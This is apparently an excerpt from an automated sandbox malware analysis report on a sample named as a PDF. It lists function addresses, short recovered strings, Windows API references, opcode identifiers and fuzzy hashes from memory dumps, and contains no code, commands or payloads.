Opcode Fuzzy Hash: e39a3c4bae11ae0279f65c786a4cdce0cad6b46bddf0ed6eb938906ad6837b0b
Instruction Fuzzy Hash: C82252B0B002099FEB14DBB9C5546AEBBF6AF88300F288169D509EB395DF349D46CB51

Function 01D2C146 Relevance: 6.5, Strings: 5, Instructions: 231
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 01D2C377
PH^q, xrefs: 01D2C400
0oAp, xrefs: 01D2C20A
PH^q, xrefs: 01D2C3EF
LjAp, xrefs: 01D2C38D

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 5ca502181bde76b1adb382a71a209c87d0b2307ab89707b9ec64956a57ca0f2e
Instruction ID: 2e9248805a02b99141f7b18f967b1a9b32e86534d5e7eaa1cb89b8a8ef6770c6
Opcode Fuzzy Hash: 5ca502181bde76b1adb382a71a209c87d0b2307ab89707b9ec64956a57ca0f2e
Instruction Fuzzy Hash: 2AA1E374E10218DFDB14CFAAD884A9DBBF2BF99314F14806AE819AB365DB319D41CF50

Function 01D2C468 Relevance: 6.4, Strings: 5, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 01D2C4DA
PH^q, xrefs: 01D2C6D0
PH^q, xrefs: 01D2C6BF
LjAp, xrefs: 01D2C647
LjAp, xrefs: 01D2C65D

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: d68d05f8aa8479e41454bd547b2fbb4a67aa1e92314e25227087987034b6172f
Instruction ID: 512bea994ccf120031f90905b51f84fd062a9869410f23016b640bf857271c99
Opcode Fuzzy Hash: d68d05f8aa8479e41454bd547b2fbb4a67aa1e92314e25227087987034b6172f
Instruction Fuzzy Hash: 0D81B274E10218CFDB14DFAAD884A9DBBF2BF98304F149069E819AB365DB34AD41CF50

Function 01D25370 Relevance: 6.4, Strings: 5, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 01D255D9
LjAp, xrefs: 01D25550
PH^q, xrefs: 01D255C8
LjAp, xrefs: 01D25566
0oAp, xrefs: 01D253E2

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 7716d9adb4f1f590ea03da59d2165271ed794bb28bc488641e96b364dce1bcd5
Instruction ID: a5fd23d04df8bee1a585cd3fec4532fe5f9a5e04ccd1eb634bf5ad0f80877048
Opcode Fuzzy Hash: 7716d9adb4f1f590ea03da59d2165271ed794bb28bc488641e96b364dce1bcd5
Instruction Fuzzy Hash: 8581A474E00218DFDB14DFAAD984A9DBBF2BF88304F14D069E819AB365DB349945CF50

Function 01D2D278 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0oAp, xrefs: 01D2D2EA
PH^q, xrefs: 01D2D4CF
PH^q, xrefs: 01D2D4E0
LjAp, xrefs: 01D2D457
LjAp, xrefs: 01D2D46D

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 970245738052f1692d9fb30f1be10161feadd86722553c561c42a06af4bc5833
Instruction ID: f8db676cc8d22ad5ce65eecd5067e6189e579e53c6be6b50cea616f594e59f08
Opcode Fuzzy Hash: 970245738052f1692d9fb30f1be10161feadd86722553c561c42a06af4bc5833
Instruction Fuzzy Hash: 2A81C474E00618CFDB14DFAAD884A9DBBF2BF98304F14D069E819AB365DB349985CF10

Function 01D2CA08 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PH^q, xrefs: 01D2CC70
0oAp, xrefs: 01D2CA7A
PH^q, xrefs: 01D2CC5F
LjAp, xrefs: 01D2CBFD
LjAp, xrefs: 01D2CBE7

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 354ff2cbcc005bd0aaafd706ad100159b20ad96756df77844b033cd8adcd4eeb
Instruction ID: b16a8f70dc08379c5d846a5e3961a39dde960522a8e72dbb535fdd15ead5a695
Opcode Fuzzy Hash: 354ff2cbcc005bd0aaafd706ad100159b20ad96756df77844b033cd8adcd4eeb
Instruction Fuzzy Hash: B481A074E00218CFDB14DFAAD884A9DBBF2BF98304F148069E819AB365DB349D85CF50

Function 01D2CCD8 Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 01D2CECD
PH^q, xrefs: 01D2CF2F
0oAp, xrefs: 01D2CD4A
LjAp, xrefs: 01D2CEB7
PH^q, xrefs: 01D2CF40

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 6602e590140251d97f730e329da579bf9dbc03dc17e7ddd75299be5e08b8eb1e
Instruction ID: c2c3b5d62faa9bf05838064c1d532e4b1fd777d0ae0450979d678b10a14f6b3b
Opcode Fuzzy Hash: 6602e590140251d97f730e329da579bf9dbc03dc17e7ddd75299be5e08b8eb1e
Instruction Fuzzy Hash: 6E81B074E00218DFDB14DFAAD984A9DBBF2BF98304F14C069E819AB265DB349D85CF50

Function 01D2CFAA Relevance: 6.4, Strings: 5, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 01D2D187
0oAp, xrefs: 01D2D01A
PH^q, xrefs: 01D2D1FF
LjAp, xrefs: 01D2D19D
PH^q, xrefs: 01D2D210

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 6d9345104e806855c0f023bd4d54076ed68eca48e91d26dc5060a2cd2f498879
Instruction ID: 1cb6102a76a71af0601d905c837cc58e2e8b7bd46de1b19dd8daea7cf1218614
Opcode Fuzzy Hash: 6d9345104e806855c0f023bd4d54076ed68eca48e91d26dc5060a2cd2f498879
Instruction Fuzzy Hash: FD81D674E00618CFDB14DFAAD984A9DBBF2BF98304F14C169E819AB365DB349981CF10

Function 01D2C738 Relevance: 6.4, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

LjAp, xrefs: 01D2C92D
LjAp, xrefs: 01D2C917
PH^q, xrefs: 01D2C9A0
0oAp, xrefs: 01D2C7AA
PH^q, xrefs: 01D2C98F

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 7b6fdefe2521ef95d2f4a0dc50663aed11aeb045a2c03fb0c7afbc52b49446e1
Instruction ID: 81dd87364e53c333bc632192eabc35bc551917abf2f610d6fca41cf997879967
Opcode Fuzzy Hash: 7b6fdefe2521ef95d2f4a0dc50663aed11aeb045a2c03fb0c7afbc52b49446e1
Instruction Fuzzy Hash: 0D81AF74E00218CFDB14DFAAD984A9DBBF2BF88304F14C069E819AB265DB749985CF50

Function 01D229EC Relevance: 5.5, Strings: 4, Instructions: 487
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Xbq, xrefs: 01D22BA4
Xbq, xrefs: 01D22B57
Xbq, xrefs: 01D22AD8
Xbq, xrefs: 01D22A9E

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: Xbq$Xbq$Xbq$Xbq
API String ID: 0-2732225958
Opcode ID: 97254b771935a4786adbdbb5a1c9b708396793f78f469d90365fc98c583ce5a5
Instruction ID: 072afdc77e04ca8c932e5373f1e3c6524856c2dc22f67f970fa76b9ce5048a0c
Opcode Fuzzy Hash: 97254b771935a4786adbdbb5a1c9b708396793f78f469d90365fc98c583ce5a5
Instruction Fuzzy Hash: 71F10D31A063D4CBEF639F3884905ABBF71BF57218F5948EDE45097925C639480ECB92

Function 01D26FC8 Relevance: 5.4, Strings: 4, Instructions: 449COMMON

Download Yara Rule

Strings

,bq, xrefs: 01D27298
(o^q, xrefs: 01D27212
(o^q, xrefs: 01D27220
,bq, xrefs: 01D2728A

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: 50418bc5087c97753e3e84f13a3be86a5f391c9405fc7e53294379da224740af
Instruction ID: 37686d4611157bd651bd52afdc171ac79e88505bf0bffe36ef9ba9577ae2dbf4
Opcode Fuzzy Hash: 50418bc5087c97753e3e84f13a3be86a5f391c9405fc7e53294379da224740af
Instruction Fuzzy Hash: 90027230A00229DFDB25CF69C884AAEBBF6FF68308F158465E865A7261D734ED41CF51

Function 01D2A088 Relevance: 3.4, Strings: 2, Instructions: 893COMMON

Download Yara Rule

Strings

(o^q, xrefs: 01D2A518
4'^q, xrefs: 01D2AB13

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: (o^q$4'^q
API String ID: 0-273632683
Opcode ID: c05c02c589eee08293de346ed3235c5854552964b03ef586391befbee8f0e887
Instruction ID: 41952db4f07e6649f2c240329ce79bfb0e94d09ef5e9766777b1cfba1d8e3ec1
Opcode Fuzzy Hash: c05c02c589eee08293de346ed3235c5854552964b03ef586391befbee8f0e887
Instruction Fuzzy Hash: 71829E71A00219CFCB15CFA8C984AAEBBF2FF98308F158559E5259B662D734ED41CB50

Function 0761D118 Relevance: 3.3, APIs: 2, Instructions: 319COMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 0761D27E
GetActiveWindow.USER32 ref: 0761D2F6

Memory Dump Source

Source File: 00000003.00000002.4181157256.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7610000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: ActiveCaptureWindow
String ID:
API String ID: 2424615356-0
Opcode ID: 45ea41b913703eb2003e318494b6e62cd78c19e243041caa08e28fc683167d02
Instruction ID: 96eef9b25a5c43ae0da7b75014128768d2c50aa6ed888580d97a501fc0ea6984
Opcode Fuzzy Hash: 45ea41b913703eb2003e318494b6e62cd78c19e243041caa08e28fc683167d02
Instruction Fuzzy Hash: 25D110B4E00209DFEB25DFB9C588A9DBBF1BF89304F248169D509AB365DB709985CF10

Function 01D269A0 Relevance: 3.0, Strings: 2, Instructions: 510COMMON

Download Yara Rule

Strings

(o^q, xrefs: 01D26EDA
Hbq, xrefs: 01D26DA6

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: d17acf39b8946b7cd171dc615d222cecaa8f939e017811ca36e951d983039b6d
Instruction ID: 987f1d23f969cfa583b98382b0a7452730360466f6576cd0302428f00bfc69ee
Opcode Fuzzy Hash: d17acf39b8946b7cd171dc615d222cecaa8f939e017811ca36e951d983039b6d
Instruction Fuzzy Hash: ED12AC70A002298FCB15DF69C894AAEBBF6FF98304F148569E915DB391DB34DD41CB90

Function 01D23E09 Relevance: 2.8, Strings: 2, Instructions: 267COMMON

Download Yara Rule

Strings

Xbq, xrefs: 01D23E47
$^q, xrefs: 01D23E2E

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: Xbq$$^q
API String ID: 0-1593437937
Opcode ID: 4f3ffbce6fda62a219c444de0f271bbd4c2c6b165431b3c49feda70a43ecc1ed
Instruction ID: def83fb2e814f0733e457a34a6d8ed9fd0d758ac668a6263dfecd22a5e556a58
Opcode Fuzzy Hash: 4f3ffbce6fda62a219c444de0f271bbd4c2c6b165431b3c49feda70a43ecc1ed
Instruction Fuzzy Hash: BE91A470B04229DBDB18ABB8C55427F7BB7BFD8700B04892DE456E7398CE35C9428B95

Function 05B60B30 Relevance: .7, Instructions: 709COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9276b4bf946bd5a419b3d88644cfed9fa18e6ae1b2f2965f1e67e2718f2e4bc
Instruction ID: 97529a048eca63cc71636c428858d6b604e9b256bf4753219d30cb294c402b88
Opcode Fuzzy Hash: b9276b4bf946bd5a419b3d88644cfed9fa18e6ae1b2f2965f1e67e2718f2e4bc
Instruction Fuzzy Hash: 4872AE74E05229CFDB64DF69C984BE9BBB2BB49300F1491E9D409A7351EB34AE81CF50

Function 05B6AB50 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf744f2d45169c4acfded69fa35f58a0df124246b9ed6bbf8506da4724053a37
Instruction ID: f213ee7eaa3b730919df5409f3d3fe696f68f4ae49e7950820fdf533e4747f42
Opcode Fuzzy Hash: bf744f2d45169c4acfded69fa35f58a0df124246b9ed6bbf8506da4724053a37
Instruction Fuzzy Hash: F7C18E74E01218CFDB14DFA5D994BADBBB2FB88301F1090A9D809A7364DB35AE85CF50

Function 05B6AFB0 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d2e18816d6c6358ca2202f6de240dc504231aea5e731cc4dffba64152b2f5fe
Instruction ID: d341697f80489a33c40d719aa784a9f53f48f5cb98048c73bb0344e74a2cd40f
Opcode Fuzzy Hash: 5d2e18816d6c6358ca2202f6de240dc504231aea5e731cc4dffba64152b2f5fe
Instruction Fuzzy Hash: 94A11470E00208CFDB24DFA9D584B9DBBB1FF48304F249269E419AB2A1DB746985CF51

Function 05B6B2F6 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08d1dee7de54c8b4a405c7c9e7aad6d4a58f19cf7106570572f4b8ce8eb32083
Instruction ID: 51ec5b4259b17ca32cbaa63a7ac2658b7d930462eb1cd9e46449f19f8f931104
Opcode Fuzzy Hash: 08d1dee7de54c8b4a405c7c9e7aad6d4a58f19cf7106570572f4b8ce8eb32083
Instruction Fuzzy Hash: 7491F670E00618CFDB14DFA8D584BECBBB1FF49314F2492A9E419AB291DB74A985CF14

Function 01D2E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce4d9731bd5bf0b74ae23b5c48f8d6e514519d87dd5fa4bdaf6af7bee5330d2c
Instruction ID: 563545fd696204bf6d88e4e4cdf3a29e07251fd9c4890caf75718a4f6a8dd116
Opcode Fuzzy Hash: ce4d9731bd5bf0b74ae23b5c48f8d6e514519d87dd5fa4bdaf6af7bee5330d2c
Instruction Fuzzy Hash: 2C51B574E00218DFDB18DFAAD594A9DBBF2FF88304F249029E819AB364DB319945CF50

Function 01D2E97A Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83969a01d8ac2b80be2ed1268397dea31f85fe7b8c6f79531d53056107e51d9c
Instruction ID: 63141e8bafcd7a9a90210d44ab3e0a5d99e5b9f943dd1a46d450e0603145cb57
Opcode Fuzzy Hash: 83969a01d8ac2b80be2ed1268397dea31f85fe7b8c6f79531d53056107e51d9c
Instruction Fuzzy Hash: F951A774E00218DFDB18DFAAD594A9DBBF2FF88304F149029E819AB364DB359945CF10

Function 07616898 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 07616CEB
Hbq, xrefs: 076169AC
Hbq, xrefs: 07616968
Hbq, xrefs: 076169F0
Hbq, xrefs: 07616CB9

Memory Dump Source

Source File: 00000003.00000002.4181157256.0000000007610000.00000040.00000800.00020000.00000000.sdmp, Offset: 07610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7610000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq$Hbq$Hbq
API String ID: 0-1677660839
Opcode ID: 0447ca788b02796c6e16120b56c453b31790ca61a06f81370d1c3f98eb13af80
Instruction ID: 91fcb11b8122617cb6a11775613800183b549fb05be6ac1ab356ca60f266b90b
Opcode Fuzzy Hash: 0447ca788b02796c6e16120b56c453b31790ca61a06f81370d1c3f98eb13af80
Instruction Fuzzy Hash: C1D1AFB4B002158FDB14EBB9C5545AEBBF6FF88310B2444A9D406AB390DF35ED42CBA5

Function 01D276F1 Relevance: 10.5, Strings: 8, Instructions: 471
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(o^q, xrefs: 01D27C0F
(o^q, xrefs: 01D27BFF
(o^q, xrefs: 01D278B2
(o^q, xrefs: 01D2772E
(o^q, xrefs: 01D27815
,bq, xrefs: 01D27B90
,bq, xrefs: 01D27BA0
(o^q, xrefs: 01D277E9

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
API String ID: 0-1932283790
Opcode ID: ba9fc2412144117f41972682d507f2c690f4af0e30cf2ebb9968ba670edd1617
Instruction ID: 7d2766a574b53cec5d9fa2224932fefd550733ab66df64543e8b6d227d8aa1c3
Opcode Fuzzy Hash: ba9fc2412144117f41972682d507f2c690f4af0e30cf2ebb9968ba670edd1617
Instruction Fuzzy Hash: 8D124A30A002198FCB25CF69D984A9EBBF2FFA8318F148569E569DB361D730ED45CB50

Function 05B66904 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 05B671CE
GetCurrentThread.KERNEL32 ref: 05B6720B
GetCurrentProcess.KERNEL32 ref: 05B67248
GetCurrentThreadId.KERNEL32 ref: 05B672A1

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 80be8cbc0e6bea788f43d32c1849e1cc75e1593d25c86cbf01125e0ed5d060ac
Instruction ID: bdbd7c28038ed925d2090edea30d7d72999d39667c2c8c85ec4d9510543bcbdf
Opcode Fuzzy Hash: 80be8cbc0e6bea788f43d32c1849e1cc75e1593d25c86cbf01125e0ed5d060ac
Instruction Fuzzy Hash: C85146B09002098FDB14DFA9D548B9EBBF1FB48318F2484A9E419A7360DB34A984CF65

Function 05B67148 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 05B671CE
GetCurrentThread.KERNEL32 ref: 05B6720B
GetCurrentProcess.KERNEL32 ref: 05B67248
GetCurrentThreadId.KERNEL32 ref: 05B672A1

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: c765cace2abe66a6cd7f1fa43af96923f2d7d65b55ef8b1cb3a390c88fb3b1ec
Instruction ID: b403dc92045803aa9af94774972cd9fc2457f7bd94212029c861fb1c83967862
Opcode Fuzzy Hash: c765cace2abe66a6cd7f1fa43af96923f2d7d65b55ef8b1cb3a390c88fb3b1ec
Instruction Fuzzy Hash: 475156B09002498FDB14CFA9D548B9EBBF1FB48318F2484A9E419A7360DB34A984CF65

Function 05B65EE5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 201COMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 05B65F9F

Strings

Hbq, xrefs: 05B661BB
Hbq, xrefs: 05B66200

Memory Dump Source

Source File: 00000003.00000002.4172891156.0000000005B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5b60000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: ActiveWindow
String ID: Hbq$Hbq
API String ID: 2558294473-4258043069
Opcode ID: 41fce7c70d69ff68e0beff8ed229f5a24db07fd66f5db77e94cfb12a35c34106
Instruction ID: 773196d5999e81ce18c4ce9c150dc4bdab745ffe2260ca39b94f94064c2535a1
Opcode Fuzzy Hash: 41fce7c70d69ff68e0beff8ed229f5a24db07fd66f5db77e94cfb12a35c34106
Instruction Fuzzy Hash: 79618E34F002559FDB18AFB4D4586AE7BE3FF94300F548868D40AEB390DE389992CB51

Function 01D28490 Relevance: 3.2, Strings: 2, Instructions: 701COMMON

Download Yara Rule

Strings

$^q, xrefs: 01D28FD7
$^q, xrefs: 01D28FB4

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 6a3c8c58677ac39c964aefa1015888c96c84005002f4381f2b73fc76abd90cda
Instruction ID: e109872c99579104f1567c36f46a158cd19a33d62725263e196097a8d5615326
Opcode Fuzzy Hash: 6a3c8c58677ac39c964aefa1015888c96c84005002f4381f2b73fc76abd90cda
Instruction Fuzzy Hash: F3525574A00218CFEB159BA8C850B9EBBB7FF54300F1481A9C50AAB355DF359E85EF51

Function 08A506D0 Relevance: 3.1, APIs: 2, Instructions: 98windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 08A50736
KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 08A50787

Memory Dump Source

Source File: 00000003.00000002.4182149276.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8a50000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: CallbackDispatcherFocusUser
String ID:
API String ID: 1077007772-0
Opcode ID: 93dbe80be530ceaf66719456ff09aeab1e9b0944423385c99563854f56d85d03
Instruction ID: 01aa60a09685151dc2d61208fcdccd91885ca540afd2c240b140da7739280c5b
Opcode Fuzzy Hash: 93dbe80be530ceaf66719456ff09aeab1e9b0944423385c99563854f56d85d03
Instruction Fuzzy Hash: C2317A74A00A25CFDB10DF69C548BAEBBB5BF48B11F1444A8D805AB750DB34E880CFE0

Function 08A506C0 Relevance: 3.1, APIs: 2, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 08A50736
KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 08A50787

Memory Dump Source

Source File: 00000003.00000002.4182149276.0000000008A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08A50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8a50000_PDF-3093900299039 pdf.jbxd

Similarity

API ID: CallbackDispatcherFocusUser
String ID:
API String ID: 1077007772-0
Opcode ID: bd38d6f4bf584586a9902051bf5ceecf9904542ac7059ff6ebe76dba3aee03a6
Instruction ID: c7b21055311b21bc30f588847957fc9082c86b7a7df2ca2a0433946dea84d462
Opcode Fuzzy Hash: bd38d6f4bf584586a9902051bf5ceecf9904542ac7059ff6ebe76dba3aee03a6
Instruction Fuzzy Hash: C22168B9900A59DFDB108F69C5487EEBBB4FF18B20F1440A9E808A7751C734A984CFE1

Function 01D25F38 Relevance: 2.8, Strings: 2, Instructions: 266COMMON

Download Yara Rule

Strings

Hbq, xrefs: 01D26023
Hbq, xrefs: 01D26056

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1d20000_PDF-3093900299039 pdf.jbxd

Similarity

API ID:
String ID: Hbq$Hbq
API String ID: 0-4258043069
Opcode ID: eb9f40e5c2eaa7eb78549620d4a4dfa823e06a1486b365ac96785db0c95f3823
Instruction ID: cd4a6e7f1318ff4cc260e550c9d679f9232e4357a2a8b2ecc6772161af4d5a5c
Opcode Fuzzy Hash: eb9f40e5c2eaa7eb78549620d4a4dfa823e06a1486b365ac96785db0c95f3823
Instruction Fuzzy Hash: 6C91D0307043658FDB169F38D854A6A7BF6BF98308F188569E8568B392CF39CC01D791

Function 01D26498 Relevance: 2.7, Strings: 2, Instructions: 229COMMON

Download Yara Rule

Strings

,bq, xrefs: 01D2656E
,bq, xrefs: 01D26578

Memory Dump Source

Source File: 00000003.00000002.4133090168.0000000001D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 01D20000, based on PE: false

Joe Sandbox IDA Plugin

